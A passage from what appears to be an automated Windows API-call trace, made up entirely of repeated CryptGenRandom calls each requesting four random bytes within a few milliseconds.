pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.075] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, 